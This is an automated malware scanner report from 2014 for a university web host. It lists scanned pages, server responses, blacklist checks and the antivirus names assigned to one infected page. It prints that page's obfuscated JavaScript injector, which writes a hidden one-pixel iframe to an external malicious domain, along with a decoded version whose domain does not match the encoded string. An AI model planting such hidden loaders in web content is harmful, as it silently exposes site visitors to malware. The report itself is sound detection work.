Malware Scanner report for www2.arnes.si

Malicious/Suspicious/Total URLs checked: 1/0/9
1 page has malicious code. See details below.
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Scanned pages/files

Request / Server response / Status
http://www2.arnes.si/~bzidan
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 23 Oct 2014 08:05:18 GMT
Location: http://www2.arnes.si/~bzidan/
Server: Apache
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1
clean
http://www2.arnes.si/~bzidan/
200 OK
Content-Length: 10689
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ge35ebc1854(a6cd0b741){var ab6b21af='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var k69359ed8='';var ka36c8b,d274c8b,a4430c2,h890589c2,w2c792f5d,i92032e5,d04cba01;var pea655a=0;do{h890589c2=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));w2c792f5d=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));i92032e5=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));d04cba01=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));ka36c8b=(h890589c2<<2)|(w2c792f5d>>4);d274c8b=((w2c79
... 204 bytes are skipped ...
g.fromCharCode(ka36c8b);if(i92032e5!=64){if(d274c8b>=192)d274c8b+=848;else if(d274c8b==168)d274c8b=1025;else if(d274c8b==184)d274c8b=1105;k69359ed8+=String.fromCharCode(d274c8b);}if(d04cba01!=64){if(a4430c2>=192)a4430c2+=848;else if(a4430c2==168)a4430c2=1025;else if(a4430c2==184)a4430c2=1105;k69359ed8+=String.fromCharCode(a4430c2);}}while(pea655a<a6cd0b741.length);document.write(k69359ed8);};ge35ebc1854('PGlmcmFtZSBzcmMgPSAiaHR0cDovL25ld2hhcHB5bWF5LmNvbS8xLyIgd2lkdGg9MSBoZWlnaHQ9MT4A');

Decoded script:


<iframe src="http://yt6tyg.cn/1/index.php" width="1" height="1" frameborder="0"></iframe>

Antivirus reports:

nProtect: JS:Trojan.Crypt.JV
Emsisoft: JS:Trojan.Crypt.JV (B)
Kaspersky: Trojan-Downloader.JS.Iframe.byo
MicroWorld-eScan: JS:Trojan.Crypt.JV
Fortinet: JS/Iframe.BYO!tr
NANO-Antivirus: Trojan.Url.IframeB.bqouic
F-Secure: JS:Trojan.Crypt.JV
GData: JS:Trojan.Crypt.JV
BitDefender: JS:Trojan.Crypt.JV

http://www2.arnes.si/~bzidan/Res/code/shared.js
200 OK
Content-Length: 5448
Content-Type: application/x-javascript
clean
http://www2.arnes.si/Res/code/boxController.js
404 Not Found
Content-Length: 286
Content-Type: text/html
clean
http://www2.arnes.si/test404page.js
404 Not Found
Content-Length: 275
Content-Type: text/html
clean
http://www2.arnes.si/Res/code/boxSettings.js
404 Not Found
Content-Length: 284
Content-Type: text/html
clean
http://www2.arnes.si/Res/tree/tree.js
404 Not Found
Content-Length: 277
Content-Type: text/html
clean
http://www2.arnes.si/Res/tree/tree_items.js
404 Not Found
Content-Length: 283
Content-Type: text/html
clean
http://www2.arnes.si/Res/tree/tree_tpl.js
404 Not Found
Content-Length: 281
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: www2.arnes.si

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: www2.arnes.si
Referer: http://www.google.com/search?q=www2.arnes.si

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=www2.arnes.si

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://www2.arnes.si/

Result: www2.arnes.si is not infected or malware details are not published yet.